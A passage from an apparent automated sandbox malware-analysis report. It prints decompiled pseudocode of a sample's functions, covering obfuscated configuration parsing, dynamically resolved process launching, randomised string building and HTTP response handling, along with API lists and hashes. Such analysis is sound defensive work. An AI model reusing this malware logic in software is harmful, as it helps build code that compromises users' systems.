				_t7 = E0421607D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E042117AB(_a4);
				}
				return _t12;
			}





                    0x04214dd4
                    0x04214dd9
                    0x04214ddd
                    0x04214de4
                    0x04214def
                    0x04214df3
                    0x04214df3
                    0x04214dfc

                    APIs
                      • Part of subcall function 0421607D: memcpy.NTDLL(00000000,00000110,?,?,?,?,04214DD9,?,04213AC6,04213AC6,?), ref: 042160B3
                      • Part of subcall function 0421607D: memset.NTDLL ref: 04216128
                      • Part of subcall function 0421607D: memset.NTDLL ref: 0421613C
                    • memcpy.NTDLL(?,04213AC6,00000000,?,04213AC6,04213AC6,?,?,04213AC6,?), ref: 04214DE4
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: memcpymemset$FreeHeap
                    • String ID:
                    • API String ID: 3053036209-0
                    • Opcode ID: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction ID: 3c2f0cd841d5680e2d2376bf45ecc7b812895cf002bc6c81296dd55bbc43e7ed
                    • Opcode Fuzzy Hash: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction Fuzzy Hash: 9EE08C37610129B7DB122A94DC40EFF7FACDF656D1F044060FE089A220E632E62193E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 04214EF3 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E04214EF3(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x421a31c; // 0x69b25f44
				if(E04214451( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x421a374 = _v8;
				}
				_t33 =  *0x421a31c; // 0x69b25f44
				if(E04214451( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x421a31c; // 0x69b25f44
				_push(_t115);
				if(E04214451( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x421a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x421a31c; // 0x69b25f44
						_t45 = E0421572F(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x421a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x421a31c; // 0x69b25f44
						_t46 = E0421572F(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x421a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x421a31c; // 0x69b25f44
						_t47 = E0421572F(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x421a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x421a31c; // 0x69b25f44
						_t48 = E0421572F(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x421a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x421a31c; // 0x69b25f44
						_t49 = E0421572F(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x421a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x421a31c; // 0x69b25f44
						_t50 = E0421572F(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x421a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x421a31c; // 0x69b25f44
								_t51 = E0421572F(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E04211760(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04214DFF();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x421a31c; // 0x69b25f44
								_t52 = E0421572F(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E04211760(0, _t52) != 0) {
								_t121 =  *0x421a3cc; // 0x4a995b0
								E04211000(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x421a31c; // 0x69b25f44
								_t53 = E0421572F(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x421a320; // 0x87d5a8
								_t22 = _t54 + 0x421b252; // 0x616d692f
								 *0x421a370 = _t22;
								goto L60;
							} else {
								_t64 = E04211760(0, _t53);
								 *0x421a370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x421a31c; // 0x69b25f44
										_t56 = E0421572F(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x421a320; // 0x87d5a8
										_t23 = _t57 + 0x421b791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E04211760(0, _t56);
									}
									 *0x421a3e0 = _t58;
									HeapFree( *0x421a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                    0x04214ef3
                    0x04214ef3
                    0x04214ef3
                    0x04214ef3
                    0x04214ef6
                    0x04214f13
                    0x04214f21
                    0x04214f21
                    0x04214f26
                    0x04214f40
                    0x042151ae
                    0x042151b5
                    0x042151b9
                    0x042151b9
                    0x04214f46
                    0x04214f4b
                    0x04214f63
                    0x0421519b
                    0x042151a5
                    0x00000000
                    0x04214f69
                    0x04214f69
                    0x04214f6a
                    0x04214f6f
                    0x04214f85
                    0x04214f71
                    0x04214f71
                    0x04214f7e
                    0x04214f7e
                    0x04214f89
                    0x04214f90
                    0x04214f92
                    0x04214f9c
                    0x04214fa1
                    0x04214fa1
                    0x04214f9c
                    0x04214fa8
                    0x04214fbe
                    0x04214faa
                    0x04214faa
                    0x04214fb7
                    0x04214fb7
                    0x04214fc2
                    0x04214fc4
                    0x04214fce
                    0x04214fd3
                    0x04214fd3
                    0x04214fce
                    0x04214fda
                    0x04214ff0
                    0x04214fdc
                    0x04214fdc
                    0x04214fe9
                    0x04214fe9
                    0x04214ff4
                    0x04214ff6
                    0x04215000
                    0x04215005
                    0x04215005
                    0x04215000
                    0x0421500c
                    0x04215022
                    0x0421500e
                    0x0421500e
                    0x0421501b
                    0x0421501b
                    0x04215026
                    0x04215028
                    0x04215032
                    0x04215037
                    0x04215037
                    0x04215032
                    0x0421503e
                    0x04215054
                    0x04215040
                    0x04215040
                    0x0421504d
                    0x0421504d
                    0x04215058
                    0x0421505a
                    0x04215064
                    0x04215069
                    0x04215069
                    0x04215064
                    0x04215070
                    0x04215086
                    0x04215072
                    0x04215072
                    0x0421507f
                    0x0421507f
                    0x0421508a
                    0x0421509d
                    0x0421509d
                    0x00000000
                    0x0421508c
                    0x0421508c
                    0x04215096
                    0x00000000
                    0x042150a7
                    0x042150a7
                    0x042150a9
                    0x042150bf
                    0x042150ab
                    0x042150ab
                    0x042150b8
                    0x042150b8
                    0x042150c3
                    0x042150c5
                    0x042150c8
                    0x042150c9
                    0x042150d0
                    0x042150d2
                    0x042150d3
                    0x042150d3
                    0x042150d0
                    0x042150da
                    0x042150f0
                    0x042150dc
                    0x042150dc
                    0x042150e9
                    0x042150e9
                    0x042150f4
                    0x04215102
                    0x0421510c
                    0x0421510c
                    0x04215114
                    0x0421512a
                    0x04215116
                    0x04215116
                    0x04215123
                    0x04215123
                    0x0421512e
                    0x04215141
                    0x04215141
                    0x04215146
                    0x0421514c
                    0x00000000
                    0x04215130
                    0x04215133
                    0x0421513a
                    0x0421513f
                    0x04215151
                    0x04215153
                    0x04215169
                    0x04215155
                    0x04215155
                    0x04215162
                    0x04215162
                    0x0421516d
                    0x04215179
                    0x0421517e
                    0x0421517e
                    0x0421516f
                    0x04215172
                    0x04215172
                    0x0421518c
                    0x04215191
                    0x04215197
                    0x00000000
                    0x0421519a
                    0x00000000
                    0x0421513f
                    0x0421512e
                    0x04215096
                    0x0421508a

                    APIs
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04214F98
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04214FCA
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04214FFC
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0421502E
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04215060
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04215092
                    • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04215191
                    • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 042151A5
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 5fbc021df71a4c9123563651f96da55f78811fae61d3496f61c5feee47dd2daa
                    • Instruction ID: 135858b0598f71fd88be031238eb8cf3432b7ffa46c0a1b92d6beff0fca66972
                    • Opcode Fuzzy Hash: 5fbc021df71a4c9123563651f96da55f78811fae61d3496f61c5feee47dd2daa
                    • Instruction Fuzzy Hash: 1F819670B31205FBD711EFB8AC88D6BB7E9EBAC7447240995A005D7234EE79F9818750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421196A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E0421196A(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E0421624F(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04217961( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x421a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x421a320; // 0x87d5a8
					_t18 = _t47 + 0x421b3e6; // 0x73797325
					_t68 = E04211E10(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x421a320; // 0x87d5a8
						_t19 = _t50 + 0x421b747; // 0x4a98cef
						_t20 = _t50 + 0x421b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04216381();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04216381();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x421a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E042117AB(_t70);
				goto L12;
			}


















                    0x04211972
                    0x04211972
                    0x04211981
                    0x0421198a
                    0x0421198d
                    0x04211a9a
                    0x04211aa1
                    0x04211aa1
                    0x0421199c
                    0x042119a4
                    0x042119a9
                    0x042119ac
                    0x042119c1
                    0x042119c7
                    0x042119c8
                    0x042119cb
                    0x042119d1
                    0x042119d4
                    0x042119d9
                    0x042119e1
                    0x042119ed
                    0x042119f1
                    0x04211a81
                    0x042119f7
                    0x042119f7
                    0x042119fc
                    0x04211a03
                    0x04211a17
                    0x04211a1b
                    0x04211a6a
                    0x04211a1d
                    0x04211a1e
                    0x04211a25
                    0x04211a3e
                    0x04211a40
                    0x04211a44
                    0x04211a4b
                    0x04211a65
                    0x04211a4d
                    0x04211a56
                    0x04211a5b
                    0x04211a5b
                    0x04211a4b
                    0x04211a79
                    0x04211a79
                    0x042119f1
                    0x04211a88
                    0x04211a91
                    0x04211a95
                    0x00000000

                    APIs
                      • Part of subcall function 0421624F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04211986,?,?,?,?,00000000,00000000), ref: 04216274
                      • Part of subcall function 0421624F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04216296
                      • Part of subcall function 0421624F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 042162AC
                      • Part of subcall function 0421624F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 042162C2
                      • Part of subcall function 0421624F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 042162D8
                      • Part of subcall function 0421624F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 042162EE
                    • memset.NTDLL ref: 042119D4
                      • Part of subcall function 04211E10: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,042119ED,73797325), ref: 04211E21
                      • Part of subcall function 04211E10: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04211E3B
                    • GetModuleHandleA.KERNEL32(4E52454B,04A98CEF,73797325), ref: 04211A0A
                    • GetProcAddress.KERNEL32(00000000), ref: 04211A11
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04211A79
                      • Part of subcall function 04216381: GetProcAddress.KERNEL32(36776F57,0421793C), ref: 0421639C
                    • CloseHandle.KERNEL32(00000000,00000001), ref: 04211A56
                    • CloseHandle.KERNEL32(?), ref: 04211A5B
                    • GetLastError.KERNEL32(00000001), ref: 04211A5F
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                    • String ID: Ut
                    • API String ID: 3075724336-8415677
                    • Opcode ID: 2b238d34080d3f78c17580cce69ebb99ed0b2d0a449fdc73b819eaa274158aae
                    • Instruction ID: 65e076ff26fb57a0cc974c4addf2d80dbbf4bb17971043db3d8880266097262e
                    • Opcode Fuzzy Hash: 2b238d34080d3f78c17580cce69ebb99ed0b2d0a449fdc73b819eaa274158aae
                    • Instruction Fuzzy Hash: B83132B5E10219AFDB109FA4DC88DAEBFFCEB18344F004566E605A7120DB75AE55CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421266A Relevance: 13.6, APIs: 9, Instructions: 145stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 43%
                    			E0421266A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x421a3dc; // 0x4a99c00
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E04212E72();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E04212E72();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E04212F7B(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E04212F7B(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E04211289(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x421918c;
						}
						_t70 = E04211DDD(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E042163FD(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x421a320; // 0x87d5a8
								_t102 =  *0x421a134; // 0x4217ca9
								_t28 = _t105 + 0x421bb08; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E04211289(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x4219190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E042163FD(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E042117AB(_v24);
								} else {
									_t92 =  *0x421a320; // 0x87d5a8
									_t44 = _t92 + 0x421bc80; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E042117AB(_v8);
						}
						E042117AB(_v12);
					}
					E042117AB(_v16);
				}
				return _v28;
			}



































                    0x04212670
                    0x04212678
                    0x0421267b
                    0x04212688
                    0x0421268b
                    0x04212692
                    0x04212699
                    0x0421269c
                    0x042126a9
                    0x042126ac
                    0x042126af
                    0x042126b6
                    0x042126b9
                    0x042126c1
                    0x042126c8
                    0x042126cb
                    0x042126d1
                    0x042126d5
                    0x042126de
                    0x042126e2
                    0x042126e4
                    0x042126e4
                    0x042126ec
                    0x042126f3
                    0x042126f6
                    0x042126fc
                    0x04212703
                    0x04212714
                    0x0421271b
                    0x0421272d
                    0x04212734
                    0x04212737
                    0x04212740
                    0x04212749
                    0x04212752
                    0x04212768
                    0x0421276d
                    0x04212771
                    0x04212775
                    0x0421277c
                    0x0421277f
                    0x04212781
                    0x04212781
                    0x0421278b
                    0x04212794
                    0x0421279b
                    0x042127b7
                    0x042127bb
                    0x042127f4
                    0x042127bd
                    0x042127c0
                    0x042127c8
                    0x042127d9
                    0x042127e1
                    0x042127e9
                    0x042127ed
                    0x042127ed
                    0x042127bb
                    0x042127fc
                    0x042127fc
                    0x04212804
                    0x04212804
                    0x0421280c
                    0x0421280c
                    0x04212818

                    APIs
                    • GetTickCount.KERNEL32 ref: 04212682
                    • lstrlen.KERNEL32(00000000,00000005), ref: 04212703
                    • lstrlen.KERNEL32(?), ref: 04212714
                    • lstrlen.KERNEL32(00000000), ref: 0421271B
                    • lstrlenW.KERNEL32(80000002), ref: 04212722
                    • lstrlen.KERNEL32(?,00000004), ref: 0421278B
                    • lstrlen.KERNEL32(?), ref: 04212794
                    • lstrlen.KERNEL32(?), ref: 0421279B
                    • lstrlenW.KERNEL32(?), ref: 042127A2
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$CountFreeHeapTick
                    • String ID:
                    • API String ID: 2535036572-0
                    • Opcode ID: cdc95e4706754152f525d6bce8e808aea2e9598e48a634a2664a3845d16a31ac
                    • Instruction ID: cb40f41607f034dcb904f79a8a872f4deb19be800a8a41732e2a4c1ef60292c6
                    • Opcode Fuzzy Hash: cdc95e4706754152f525d6bce8e808aea2e9598e48a634a2664a3845d16a31ac
                    • Instruction Fuzzy Hash: 71517072E00119EFDF11AFA4DC48AAE7BF5EF58314F0540A5F904A7260DB35AE21DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042158EE Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E042158EE(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E042163FD(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E042117AB(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04215867( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                    0x042158ee
                    0x042158ee
                    0x042158fe
                    0x04215901
                    0x04215905
                    0x0421590d
                    0x04215910
                    0x04215929
                    0x0421593d
                    0x04215944
                    0x0421594b
                    0x0421599e
                    0x042159a7
                    0x042159aa
                    0x042159e5
                    0x042159eb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x042159aa
                    0x04215951
                    0x00000000
                    0x04215958
                    0x04215966
                    0x04215969
                    0x0421596c
                    0x04215978
                    0x0421597c
                    0x042159de
                    0x0421597e
                    0x04215990
                    0x042159ce
                    0x042159d9
                    0x04215992
                    0x04215995
                    0x04215999
                    0x04215999
                    0x04215990
                    0x00000000
                    0x0421597c
                    0x04215951
                    0x04215915
                    0x0421591b
                    0x04215920
                    0x04215923
                    0x00000000
                    0x00000000
                    0x00000000
                    0x042159b3
                    0x042159bb
                    0x042159c2
                    0x042159c2
                    0x00000000

                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04215905
                    • SetEvent.KERNEL32(?), ref: 04215915
                    • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04215947
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0421596C
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0421598C
                    • GetLastError.KERNEL32 ref: 0421599E
                      • Part of subcall function 04215867: WaitForMultipleObjects.KERNEL32(00000002,04217AF8,00000000,04217AF8,?,?,?,04217AF8,0000EA60), ref: 04215882
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    • GetLastError.KERNEL32(00000000), ref: 042159D3
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                    • String ID:
                    • API String ID: 3369646462-0
                    • Opcode ID: 1a04b9b33aa5a7734c776eda01db4a989595a04d75556bda70af840a9840a485
                    • Instruction ID: 532468bd04b8e20b8234b2c7f771c1fa01070f63ece7477dac2d5283f7fa01e0
                    • Opcode Fuzzy Hash: 1a04b9b33aa5a7734c776eda01db4a989595a04d75556bda70af840a9840a485
                    • Instruction Fuzzy Hash: 19314FB1A10309FFDB20DF95C9849AEB7F8EB58310F1045AAE541E2160E731EA84DF91
                    Uniqueness

                    Uniqueness Score: -1.00%

